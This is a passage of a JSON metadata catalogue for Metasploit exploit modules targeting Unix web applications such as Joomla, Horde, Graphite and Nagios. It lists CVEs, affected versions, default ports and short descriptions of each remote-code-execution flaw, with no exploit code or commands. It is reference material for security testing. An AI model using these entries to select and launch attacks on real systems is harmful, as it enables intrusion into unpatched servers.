8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/google_proxystylesheet_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/graphite_pickle_exec": {
"name": "Graphite Web Unsafe Pickle Handling",
"full_name": "exploit/unix/webapp/graphite_pickle_exec",
"rank": 600,
"disclosure_date": "2013-08-20",
"type": "exploit",
"author": [
"Charlie Eriksen",
"funkypickle"
],
"description": "This module exploits a remote code execution vulnerability in the pickle\n handling of the rendering code in the Graphite Web project between version\n 0.9.5 and 0.9.10 (both included).",
"references": [
"CVE-2013-5093",
"URL-http://ceriksen.com/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/graphite_pickle_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/graphite_pickle_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/guestbook_ssi_exec": {
"name": "Matt Wright guestbook.pl Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/guestbook_ssi_exec",
"rank": 600,
"disclosure_date": "1999-11-05",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "The Matt Wright guestbook.pl <= v2.3.1 CGI script contains\n a flaw that may allow arbitrary command execution. The vulnerability\n requires that HTML posting is enabled in the guestbook.pl script, and\n that the web server must have the Server-Side Include (SSI) script\n handler enabled for the '.html' file type. By combining the script\n weakness with non-default server configuration, it is possible to exploit\n this vulnerability successfully.",
"references": [
"CVE-1999-1053",
"OSVDB-84",
"BID-776"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/guestbook_ssi_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/guestbook_ssi_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/hastymail_exec": {
"name": "Hastymail 2.1.1 RC1 Command Injection",
"full_name": "exploit/unix/webapp/hastymail_exec",
"rank": 600,
"disclosure_date": "2011-11-22",
"type": "exploit",
"author": [
"Bruno Teixeira",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in Hastymail\n 2.1.1 RC1 due to the insecure usage of the call_user_func_array() function on\n the \"lib/ajax_functions.php\" script. Authentication is required on Hastymail\n in order to exploit the vulnerability. The module has been successfully tested\n on Hastymail 2.1.1 RC1 over Ubuntu 10.04.",
"references": [
"CVE-2011-4542",
"BID-50791",
"OSVDB-77331",
"URL-https://www.dognaedis.com/vulns/DGS-SEC-3.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Hastymail 2.1.1 RC1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/hastymail_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/hastymail_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/havalite_upload_exec": {
"name": "Havalite CMS Arbitrary File Upload Vulnerability",
"full_name": "exploit/unix/webapp/havalite_upload_exec",
"rank": 600,
"disclosure_date": "2013-06-17",
"type": "exploit",
"author": [
"CWH",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.",
"references": [
"OSVDB-94405",
"EDB-26243"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/havalite_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/havalite_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/horde_unserialize_exec": {
"name": "Horde Framework Unserialize PHP Code Execution",
"full_name": "exploit/unix/webapp/horde_unserialize_exec",
"rank": 600,
"disclosure_date": "2013-06-27",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be\n abused to allow unauthenticated users to execute arbitrary code with the permissions of\n the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.\n The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean\n class to reach a dangerous call_user_func() call in the Horde_Prefs class.",
"references": [
"CVE-2014-1691",
"URL-http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection",
"URL-https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149",
"URL-https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Horde 5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/horde_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/horde_unserialize_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/hybridauth_install_php_exec": {
"name": "HybridAuth install.php PHP Code Execution",
"full_name": "exploit/unix/webapp/hybridauth_install_php_exec",
"rank": 0,
"disclosure_date": "2014-08-04",
"type": "exploit",
"author": [
"Pichaya Morimoto",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a PHP code execution vulnerability in\n HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'\n is not removed after installation allowing unauthenticated users to\n write PHP code to the application configuration file 'config.php'.\n\n Note: This exploit will overwrite the application configuration file\n rendering the application unusable.",
"references": [
"EDB-34273",
"OSVDB-109838"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/hybridauth_install_php_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/instantcms_exec": {
"name": "InstantCMS 1.6 Remote PHP Code Execution",
"full_name": "exploit/unix/webapp/instantcms_exec",
"rank": 600,
"disclosure_date": "2013-06-26",
"type": "exploit",
"author": [
"AkaStep",
"Ricardo Jorge Borges de Almeida <ricardojba1@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary PHP command execution vulnerability because of a\n dangerous use of eval() in InstantCMS in versions 1.6 and prior.",
"references": [
"BID-60816",
"PACKETSTORM-122176"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"InstantCMS 1.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/instantcms_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/instantcms_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/invision_pboard_unserialize_exec": {
"name": "Invision IP.Board unserialize() PHP Code Execution",
"full_name": "exploit/unix/webapp/invision_pboard_unserialize_exec",
"rank": 600,
"disclosure_date": "2012-10-25",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a php unserialize() vulnerability in Invision IP.Board\n <= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary\n code under the context of the webserver user.\n\n The dangerous unserialize() exists in the '/admin/sources/base/core.php' script,\n which is called with user controlled data from the cookie. The exploit abuses the\n __destruct() method from the dbMain class to write arbitrary PHP code to a file on\n the Invision IP.Board web directory.\n\n The exploit has been tested successfully on Invision IP.Board 3.3.4.",
"references": [
"CVE-2012-5692",
"OSVDB-86702",
"BID-56288",
"EDB-22398",
"URL-http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Invision IP.Board 3.3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/invision_pboard_unserialize_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_akeeba_unserialize": {
"name": "Joomla Akeeba Kickstart Unserialize Remote Code Execution",
"full_name": "exploit/unix/webapp/joomla_akeeba_unserialize",
"rank": 600,
"disclosure_date": "2014-09-29",
"type": "exploit",
"author": [
"Johannes Dahse",
"us3r777 <us3r777@n0b0.so>"
],
"description": "This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier\n 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba\n component, which is responsible for Joomla! updates. Nevertheless, it is worth noting\n that this vulnerability is only exploitable during the update of the Joomla! CMS.",
"references": [
"CVE-2014-7228",
"URL-http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html",
"URL-https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html",
"URL-http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_akeeba_unserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_comfields_sqli_rce": {
"name": "Joomla Component Fields SQLi Remote Code Execution",
"full_name": "exploit/unix/webapp/joomla_comfields_sqli_rce",
"rank": 600,
"disclosure_date": "2017-05-17",
"type": "exploit",
"author": [
"Mateus Lino",
"luisco100 <luisco100@gmail.com>"
],
"description": "This module exploits a SQL injection vulnerability in the com_fields\n component, which was introduced to the core of Joomla in version 3.7.0.",
"references": [
"CVE-2017-8917",
"EDB-42033",
"URL-https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla 3.7.0"
],
"mod_time": "2018-03-28 10:57:28 +0000",
"path": "/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_comfields_sqli_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_comjce_imgmanager": {
"name": "Joomla Component JCE File Upload Remote Code Execution",
"full_name": "exploit/unix/webapp/joomla_comjce_imgmanager",
"rank": 600,
"disclosure_date": "2012-08-02",
"type": "exploit",
"author": [
"Unknown",
"Heyder Andrade <eu@heyderandrade.org>"
],
"description": "This module exploits a vulnerability in the JCE component for Joomla!, which\n could allow an unauthenticated remote attacker to upload arbitrary files, caused by a\n failure to sufficiently sanitize user-supplied input. By sending a specially-crafted HTTP\n request, a remote attacker could exploit this vulnerability to upload a malicious PHP\n script, which could allow the attacker to execute arbitrary PHP code on the vulnerable\n system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla\n 1.5.26.",
"references": [
"OSVDB-74839",
"EDB-17734",
"BID-49338"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_comjce_imgmanager",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_contenthistory_sqli_rce": {
"name": "Joomla Content History SQLi Remote Code Execution",
"full_name": "exploit/unix/webapp/joomla_contenthistory_sqli_rce",
"rank": 600,
"disclosure_date": "2015-10-23",
"type": "exploit",
"author": [
"Asaf Orpani",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a SQL injection vulnerability found in Joomla versions\n 3.2 up to 3.4.4. The vulnerability exists in the Content History administrator\n component in the core of Joomla. Triggering the SQL injection makes it possible\n to retrieve active Super User sessions. The cookie can be used to login to the\n Joomla administrator backend. By creating a new template file containing our\n payload, remote code execution is made possible.",
"references": [
"CVE-2015-7857",
"CVE-2015-7297",
"CVE-2015-7857",
"CVE-2015-7858",
"URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/",
"URL-http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla 3.x <= 3.4.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_contenthistory_sqli_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_media_upload_exec": {
"name": "Joomla Media Manager File Upload Vulnerability",
"full_name": "exploit/unix/webapp/joomla_media_upload_exec",
"rank": 600,
"disclosure_date": "2013-08-01",
"type": "exploit",
"author": [
"Jens Hinrichsen",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as\n 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,\n which comes by default in Joomla, allowing arbitrary file uploads, and results in\n arbitrary code execution. The module has been tested successfully on Joomla 2.5.13\n and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media\n Manager, you will need to supply a valid username and password (Editor role or\n higher) in order to work properly.",
"references": [
"CVE-2013-5576",
"OSVDB-95933",
"URL-http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads",
"URL-http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/",
"URL-https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8",
"URL-http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/joomla_media_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_media_upload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/joomla_tinybrowser": {
"name": "Joomla 1.5.12 TinyBrowser File Upload Code Execution",
"full_name": "exploit/unix/webapp/joomla_tinybrowser",
"rank": 600,
"disclosure_date": "2009-07-22",
"type": "exploit",
"author": [
"spinbad <spinbad.security@googlemail.com>"
],
"description": "This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.\n This plugin is not secured in version 1.5.12 of Joomla and allows the upload\n of files to the remote server.\n By renaming the uploaded file this vulnerability can be used to upload/execute\n code on the affected system.",
"references": [
"CVE-2011-4908",
"OSVDB-64578",
"EDB-9296",
"URL-http://developer.joomla.org/security/news/301-20090722-core-file-upload.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/joomla_tinybrowser.rb",
"is_install_path": true,
"ref_name": "unix/webapp/joomla_tinybrowser",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/jquery_file_upload": {
"name": "blueimp's jQuery (Arbitrary) File Upload",
"full_name": "exploit/unix/webapp/jquery_file_upload",
"rank": 600,
"disclosure_date": "2018-10-09",
"type": "exploit",
"author": [
"Claudio Viviani",
"Larry W. Cashdollar",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload in the sample PHP upload\n handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.\n\n Due to a default configuration in Apache 2.3.9+, the widget's .htaccess\n file may be disabled, enabling exploitation of this vulnerability.\n\n This vulnerability has been exploited in the wild since at least 2015\n and was publicly disclosed to the vendor in 2018. It has been present\n since the .htaccess change in Apache 2.3.9.\n\n This module provides a generic exploit against the jQuery widget.",
"references": [
"CVE-2018-9206",
"URL-http://www.vapidlabs.com/advisory.php?v=204",
"URL-https://github.com/blueimp/jQuery-File-Upload/pull/3514",
"URL-https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206",
"URL-https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/",
"URL-https://github.com/rapid7/metasploit-framework/pull/5130",
"URL-https://httpd.apache.org/docs/current/mod/core.html#allowoverride"
],
"platform": "Linux,PHP",
"arch": "php, x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP Dropper",
"Linux Dropper"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/webapp/jquery_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/jquery_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/kimai_sqli": {
"name": "Kimai v0.9.2 'db_restore.php' SQL Injection",
"full_name": "exploit/unix/webapp/kimai_sqli",
"rank": 200,
"disclosure_date": "2013-05-21",
"type": "exploit",
"author": [
"drone",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a SQL injection vulnerability in Kimai version\n 0.9.2.x. The 'db_restore.php' file allows unauthenticated users to\n execute arbitrary SQL queries. This module writes a PHP payload to\n disk if the following conditions are met: the PHP configuration must\n have 'display_errors' enabled; Kimai must be configured to use a\n MySQL database running on localhost; and the MySQL user must have\n write permission to the Kimai 'temporary' directory.",
"references": [
"EDB-25606",
"OSVDB-93547"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Kimai version 0.9.2.x (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/kimai_sqli.rb",
"is_install_path": true,
"ref_name": "unix/webapp/kimai_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/libretto_upload_exec": {
"name": "LibrettoCMS File Manager Arbitrary File Upload Vulnerability",
"full_name": "exploit/unix/webapp/libretto_upload_exec",
"rank": 600,
"disclosure_date": "2013-06-14",
"type": "exploit",
"author": [
"CWH",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and\n possibly prior. Attackers can bypass the file extension check and abuse the upload\n feature in order to upload a malicious PHP file without authentication, which\n results in arbitrary remote code execution.",
"references": [
"OSVDB-94391",
"EDB-26213"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/libretto_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/libretto_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/maarch_letterbox_file_upload": {
"name": "Maarch LetterBox Unrestricted File Upload",
"full_name": "exploit/unix/webapp/maarch_letterbox_file_upload",
"rank": 600,
"disclosure_date": "2015-02-11",
"type": "exploit",
"author": [
"rastating"
],
"description": "This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of\n session and file validation in the file_to_index.php script. It allows unauthenticated\n users to upload files of any type and subsequently execute PHP scripts in the context of\n the web server.",
"references": [
"CVE-2015-1587"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Maarch LetterBox 2.8"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/maarch_letterbox_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/mambo_cache_lite": {
"name": "Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",
"full_name": "exploit/unix/webapp/mambo_cache_lite",
"rank": 600,
"disclosure_date": "2008-06-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a remote file inclusion vulnerability in\n includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo\n 4.6.4 and earlier.",
"references": [
"CVE-2008-2905",
"OSVDB-46173",
"BID-29716"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/mambo_cache_lite.rb",
"is_install_path": true,
"ref_name": "unix/webapp/mambo_cache_lite",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/mitel_awc_exec": {
"name": "Mitel Audio and Web Conferencing Command Injection",
"full_name": "exploit/unix/webapp/mitel_awc_exec",
"rank": 600,
"disclosure_date": "2010-12-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a command injection flaw within the Mitel\n Audio and Web Conferencing web interface.",
"references": [
"OSVDB-69934"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/mitel_awc_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/mitel_awc_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/moinmoin_twikidraw": {
"name": "MoinMoin twikidraw Action Traversal File Upload",
"full_name": "exploit/unix/webapp/moinmoin_twikidraw",
"rank": 0,
"disclosure_date": "2012-12-30",
"type": "exploit",
"author": [
"Unknown",
"HTP",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability\n exists in the handling of the twikidraw actions, where a traversal path can be used\n in order to upload arbitrary files. Exploitation is achieved on Apache/mod_wsgi\n configurations by overwriting moin.wsgi, which allows execution of arbitrary Python\n code, as exploited in the wild in July 2012. This module is \"ManualRanking,\" and\n the user is warned to use this module at their own risk since it will overwrite the\n moin.wsgi file, required for the correct working of the MoinMoin wiki. While the\n exploit will try to restore the attacked application at post exploitation, successful\n restoration cannot be guaranteed.",
"references": [
"CVE-2012-6081",
"OSVDB-88825",
"BID-57082",
"EDB-25304",
"URL-http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f",
"URL-http://wiki.python.org/moin/WikiAttack2013"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MoinMoin 1.9.5"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/moinmoin_twikidraw.rb",
"is_install_path": true,
"ref_name": "unix/webapp/moinmoin_twikidraw",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/mybb_backdoor": {
"name": "myBB 1.6.4 Backdoor Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/mybb_backdoor",
"rank": 600,
"disclosure_date": "2011-10-06",
"type": "exploit",
"author": [
"tdz"
],
"description": "myBB is a popular open source PHP forum software. Version 1.6.4 contained an\n unauthorized backdoor, distributed as part of the vendor's source package.",
"references": [
"OSVDB-76111",
"BID-49993",
"SECUNIA-46300",
"URL-http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/mybb_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/webapp/mybb_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/nagios3_history_cgi": {
"name": "Nagios3 history.cgi Host Command Execution",
"full_name": "exploit/unix/webapp/nagios3_history_cgi",
"rank": 500,
"disclosure_date": "2012-12-09",
"type": "exploit",
"author": [
"Unknown <temp66@gmail.com>",
"blasty <blasty@fail0verflow.com>",
"Jose Selvi <jselvi@pentester.es>",
"Daniele Martini <cyrax@pkcrew.org>"
],
"description": "This module abuses a command injection vulnerability in the\n Nagios3 history.cgi script.",
"references": [
"CVE-2012-6096",
"OSVDB-88322",
"BID-56879",
"EDB-24084"
],
"platform": "Linux,Unix",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target",
"Appliance Nagios XI 2012R1.3 (CentOS 6.x)",
"Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/nagios3_history_cgi.rb",
"is_install_path": true,
"ref_name": "unix/webapp/nagios3_history_cgi",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/nagios3_statuswml_ping": {
"name": "Nagios3 statuswml.cgi Ping Command Execution",
"full_name": "exploit/unix/webapp/nagios3_statuswml_ping",
"rank": 600,
"disclosure_date": "2009-06-22",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module abuses a metacharacter injection vulnerability in the\n Nagios3 statuswml.cgi script. This flaw is triggered when shell\n metacharacters are present in the parameters to the ping and\n traceroute commands.",
"references": [
"CVE-2009-2288",
"OSVDB-55281"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb",
"is_install_path": true,
"ref_name": "unix/webapp/nagios3_statuswml_ping",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/nagios_graph_explorer": {
"name": "Nagios XI Network Monitor Graph Explorer Component Command Injection",
"full_name": "exploit/unix/webapp/nagios_graph_explorer",
"rank": 600,
"disclosure_date": "2012-11-30",
"type": "exploit",
